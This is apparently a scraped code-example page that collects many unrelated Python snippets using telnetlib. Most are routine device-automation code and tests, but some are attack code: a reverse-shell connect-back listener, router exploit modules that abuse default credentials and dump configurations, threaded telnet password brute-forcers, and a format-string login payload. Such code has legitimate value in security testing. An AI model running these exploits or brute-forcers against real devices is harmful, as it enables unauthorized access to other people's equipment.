def interact(self):
from telnetlib import Telnet
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((self._revHost, self._revPort))
s.listen(5)
cli = s.accept()[0]
s.close()
print("[+] Got connect-back")
t = Telnet()
t.sock = cli
t.interact()
python类Telnet()的实例源码
def check(self):
try:
tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
tn.expect(["Login: ", "login: "], 5)
tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n")
tn.write(self.config + "\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
return False # target is not vulnerable
else:
if "<DM name=" in res:
return True # target is vulnerable
except Exception:
return False # target is not vulnerable
return False # target is not vulnerable
def test_debuglevel_reads(self):
# test all the various places that self.msg(...) is called
given_a_expect_b = [
# Telnet.fill_rawq
(b'a', ": recv b''\n"),
# Telnet.process_rawq
(tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
(tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
(tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
(tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
(tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
]
for a, b in given_a_expect_b:
telnet = test_telnet([a])
telnet.set_debuglevel(1)
txt = telnet.read_all()
self.assertIn(b, telnet._messages)
return
def connect_and_login(self):
""" Establish a Telnet connection and perform a login """
self.session = Telnet()
try:
self.session.open(self.host, self.port, self.response_timeout)
except socket.timeout:
return False
if not self.login(self.username, self.password):
return False
try:
self.execute_command_lowlevel("terminal length 0")
self.execute_command_lowlevel("terminal width 0")
except EOFError:
return False
return True
def close(self):
if self.DEBUG >= 3: print "closing Telnet session <%s,%d>" % \
(self.host, self.port)
""" Close Telnet session """
self.session.close() # close telnet session
""" Check to see if tunnel exists (note: must
find better way of check if tunnel exists)
"""
try:
tunnel_exists = self.tunnel
except AttributeError, e:
return -1
except NameError, e:
return -1
if self.DEBUG >= 3: print "closing ssh tunnel <%s,%s>" % \
(self.jumpserver, self.jumpport)
""" Close ssh tunnel (if it exists) """
self.tunnel.close() # close tunnel
def __connect( self ) :
""" Connects to the defined server
If login/pass was specified, the class tries to authenticate. An error is raised
if something goes wrong.
"""
if self.__debug :
print( "[DEBUG] Connecting to host" )
self.__srv_handler = telnetlib.Telnet( self.__host, self.__port )
if self.__login != None :
self.__srv_handler.write( "USERNAME %s\n" % self.__login )
result = self.__srv_handler.read_until( "\n", self.__timeout )
if result[:2] != "OK" :
raise PyNUTError( result.replace( "\n", "" ) )
if self.__password != None :
self.__srv_handler.write( "PASSWORD %s\n" % self.__password )
result = self.__srv_handler.read_until( "\n", self.__timeout )
if result[:2] != "OK" :
raise PyNUTError( result.replace( "\n", "" ) )
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
tn = telnetlib.Telnet(ipaddr[0])
tn.read_until("login: ")
tn.write(user[:-1] + "\n")
if password:
tn.read_until("Password: ")
tn.write(value + "\n")
tn.write("ls\n")
tn.write("exit\n")
print tn.read_all()
print "\t\nLogin successful:",user[:-1], value
tn.close()
work.join()
sys.exit(2)
except:
pass
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
tn = telnetlib.Telnet(sys.argv[1])
tn.read_until("login: ")
tn.write(user + "\n")
if password:
tn.read_until("Password: ")
tn.write(value + "\n")
tn.write("ls\n")
tn.write("exit\n")
print tn.read_all()
print "\t\nLogin successful:",value, user
tn.close()
work.join()
sys.exit(2)
except:
pass
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
tn = telnetlib.Telnet(ip)
tn.read_until("login: ")
tn.write(user[:-1] + "\n")
if password:
tn.read_until("Password: ")
tn.write(value + "\n")
tn.write("ls\n")
tn.write("exit\n")
print tn.read_all()
print "\t\nLogin successful:",value, user[:-1]
tn.close()
work.join()
sys.exit(2)
except:
pass
def run(self):
try:
print_status("Trying to authenticate to the telnet server")
tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
tn.expect(["Login: ", "login: "], 5)
tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
if i != -1:
print_error("Exploit failed")
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Authentication successful")
print_status("Displaying configuration:")
tn.write(self.config + "\r\n")
tn.interact()
else:
print_error("Exploit failed")
tn.close()
except Exception:
print_error("Connection error: {}:{}".format(self.target, self.telnet_port))
def check(self):
try:
tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
tn.expect(["Login: ", "login: "], 5)
tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n")
tn.write(self.config + "\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
return False # target is not vulnerable
else:
if "<DM name=" in res:
return True # target is vulnerable
except Exception:
return False # target is not vulnerable
return False # target is not vulnerable
def run(self):
try:
print_status("Trying to authenticate to the telnet server")
tn = telnetlib.Telnet(self.target, 23, timeout=10)
tn.expect(["Login: ", "login: "], 5)
tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
if i != -1:
print_error("Exploit failed")
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Authentication successful")
print_status("Displaying configuration file:")
tn.write(self.config + "\r\n")
tn.interact()
else:
print_error("Exploit failed")
tn.close()
except Exception:
print_error("Connection error: {}:{}".format(self.target, 23))
def check(self):
try:
tn = telnetlib.Telnet(self.target, 23, timeout=10)
tn.expect(["Login: ", "login: "], 5)
tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n")
tn.write(self.config + "\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
return False # target is not vulnerable
else:
if any(map(lambda x: x in res, ["<DM name="])):
return True # target is vulnerable
except Exception:
return False # target is not vulnerable
return False # target is not vulnerable
def check(self):
try:
tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
tn.expect(["Login: ", "login: "], 5)
tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
return False # target is not vulnerable
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
return True # target is vulnerable
except Exception:
return False # target is not vulnerable
return False # target is not vulnerable
def telnet_login(self):
print_status("Telnet: {}:{} Authenticating with Username: {} Password: {}".format(self.target,
self.telnet_port,
self.remote_user,
self.remote_pass))
try:
tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
tn.read_until(': ')
tn.write(self.remote_user + '\r\n')
tn.read_until(': ')
tn.write(self.remote_pass + '\r\n')
response = tn.read_until("Login not allowed", 10)
tn.close()
except Exception:
return ""
return response
def attack(self):
try:
tn = telnetlib.Telnet(self.target, self.port, timeout=10)
tn.expect(["login: ", "Login: "], 5)
tn.close()
except Exception:
print_error("Connection error {}:{}".format(self.target, self.port))
return
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def run(self):
try:
print_status("Trying to authenticate to the telnet server")
tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
tn.expect(["Login: ", "login: "], 5)
tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
if i != -1:
print_error("Exploit failed")
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Authentication successful")
print_status("Displaying configuration:")
tn.write(self.config + "\r\n")
tn.interact()
else:
print_error("Exploit failed")
tn.close()
except Exception:
print_error("Connection error: {}:{}".format(self.target, self.telnet_port))
def run(self):
try:
print_status("Trying to authenticate to the telnet server")
tn = telnetlib.Telnet(self.target, 23, timeout=10)
tn.expect(["Login: ", "login: "], 5)
tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
if i != -1:
print_error("Exploit failed")
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Authentication successful")
print_status("Displaying configuration file:")
tn.write(self.config + "\r\n")
tn.interact()
else:
print_error("Exploit failed")
tn.close()
except Exception:
print_error("Connection error: {}:{}".format(self.target, 23))
def check(self):
try:
tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
tn.expect(["Login: ", "login: "], 5)
tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
return False # target is not vulnerable
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
return True # target is vulnerable
except Exception:
return False # target is not vulnerable
return False # target is not vulnerable
def telnet_login(self):
print_status("Telnet: {}:{} Authenticating with Username: {} Password: {}".format(self.target,
self.telnet_port,
self.remote_user,
self.remote_pass))
try:
tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
tn.read_until(': ')
tn.write(self.remote_user + '\r\n')
tn.read_until(': ')
tn.write(self.remote_pass + '\r\n')
response = tn.read_until("Login not allowed", 10)
tn.close()
except Exception:
return ""
return response
def attack(self):
try:
tn = telnetlib.Telnet(self.target, self.port, timeout=10)
tn.expect(["login: ", "Login: "], 5)
tn.close()
except Exception:
print_error("Connection error {}:{}".format(self.target, self.port))
return
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def do(self, command):
# ??Telnet???
try:
tn = telnetlib.Telnet(host=self.host, port=self.port, timeout=self.__connect_timeout)
except socket.error as err:
print("[host:%s port:%s] %s" % (self.host, self.port, err))
return
# ??doubble???
tn.write('\n')
# ????
tn.read_until(self.__finish, timeout=self.__read_timeout)
tn.write('%s\n' % command)
# ????
data = ''
while data.find(self.__finish) == -1:
data = tn.read_very_eager()
data = data.split("\n")
data = json.loads(data[0], encoding=self.__encoding)
tn.close() # tn.write('exit\n')
return data
def initIPPOOLS(rconn):
"""????IP?? REDIS???"""
ipNum=len(rconn.keys('IP*'))
if ipNum<IPPOOLNUM:
IPPOOLS=GetIPPOOLS(IPPOOLNUM)
for ipall in IPPOOLS:
try:
ip=ipall.split(':')[0]
port=ipall.split(':')[1]
telnetlib.Telnet(ip,port=port,timeout=2) #????ip????
except:
logger.warning("The ip is not available !( IP:%s )" % ipall)
else:
logger.warning("Get ip Success!( IP:%s )" % ipall)
rconn.set("IP:%s"%(ipall),ipall)
else:
logger.warning("The number of the IP is %s!" % str(ipNum))
6_1_execute_remote_telnet_cmd.py 文件源码
项目:Python-Network-Programming-Cookbook-Second-Edition
作者: PacktPublishing
项目源码
文件源码
阅读 23
收藏 0
点赞 0
评论 0
def run_telnet_session():
user = input("Enter your remote account: ")
# Comment out the above line and uncomment the below line for Python 2.7.
# user = raw_input("Enter your remote account: ")
password = getpass.getpass()
session = telnetlib.Telnet(HOST)
session.read_until(b"login: ")
session.write(user.encode('ascii') + b"\n")
if password:
session.read_until(b"Password: ")
session.write(password.encode('ascii') + b"\n")
session.write(b"ls\n")
session.write(b"exit\n")
print (session.read_all())
def shell():
if(s != ''):
print('---- interactive mode ----')
t= telnetlib.Telnet()
t.sock = s
t.interact()
elif(p != ''):
print('---- interactive mode ----')
proc.wait()
#katagaitai_command_start
#def xxd(a):
# hexdump.hexdump(a)
#
#def dbg(ss):
# print "[+] %s: 0x%x"%(ss, eval(ss))
#
#def countdown(n):
# for i in xrange(n,0,-1):
# print str(i) + "..",
# sys.stdout.flush()
# time.sleep(1)
# print
#katagaitai_command_end
def __init__(self, ip, user, password, read_timeout=None):
import telnetlib
self.tn = telnetlib.Telnet(ip, timeout=15)
self.read_timeout = read_timeout
if b'Login as:' in self.tn.read_until(b'Login as:', timeout=read_timeout):
self.tn.write(bytes(user, 'ascii') + b"\r\n")
if b'Password:' in self.tn.read_until(b'Password:', timeout=read_timeout):
# needed because of internal implementation details of the telnet server
time.sleep(0.2)
self.tn.write(bytes(password, 'ascii') + b"\r\n")
if b'for more information.' in self.tn.read_until(b'Type "help()" for more information.', timeout=read_timeout):
# login succesful
from collections import deque
self.fifo = deque()
return
raise PyboardError('Failed to establish a telnet connection with the board')
def switch(hostname,username,password1,password2,cmd1,cmd2):
tn = telnetlib.Telnet(hostname,timeout=10)
#tn.set_debuglevel(2)
tn.read_until("Username: ")
tn.write(username + "\n")
tn.read_until("Password: ")
tn.write(password1 + "\n")
tn.read_until(">")
tn.write('en'+ "\n")
tn.read_until("Password: ")
tn.write(password2 + "\n")
tn.read_until("#")
tn.write("terminal length 0"+"\n")
tn.write(cmd1 + "\n")
tn.write(cmd2 + "\n")
#tn.read_until("#")
tn.write("exit\n")
result=tn.read_all()
#print tn.read_all()
return result
def audit(arg):
port = 23
time = 5
user = 'admin'
password = '<<< %s(un=\'%s\') = %u'
finish = '->'
try:
t = telnetlib.Telnet(arg,port, timeout=time)
t.write(user + '\n')
t.read_until('password: ')
t.write(password + '\n')
str1 = t.read_until(finish)
t.write("?\n")
str = t.read_until(finish)
t.close()
if ('->' in str) and ('exec' in str):
security_hole(arg)
except Exception, e:
pass
def _test_read_any_eager_A(self, func_name):
"""
read_very_eager()
Read all data available already queued or on the socket,
without blocking.
"""
want = [self.block_long, 'x' * 100, 'y' * 100, EOF_sigil]
expects = want[1] + want[2]
self.dataq.put(want)
telnet = telnetlib.Telnet(HOST, self.port)
self.dataq.join()
func = getattr(telnet, func_name)
data = ''
while True:
try:
data += func()
self.assertTrue(expects.startswith(data))
except EOFError:
break
self.assertEqual(expects, data)
def test_read_lazy_A(self):
want = ['x' * 100, EOF_sigil]
self.dataq.put(want)
telnet = telnetlib.Telnet(HOST, self.port)
self.dataq.join()
time.sleep(self.block_short)
self.assertEqual('', telnet.read_lazy())
data = ''
while True:
try:
read_data = telnet.read_lazy()
data += read_data
if not read_data:
telnet.fill_rawq()
except EOFError:
break
self.assertTrue(want[0].startswith(data))
self.assertEqual(data, want[0])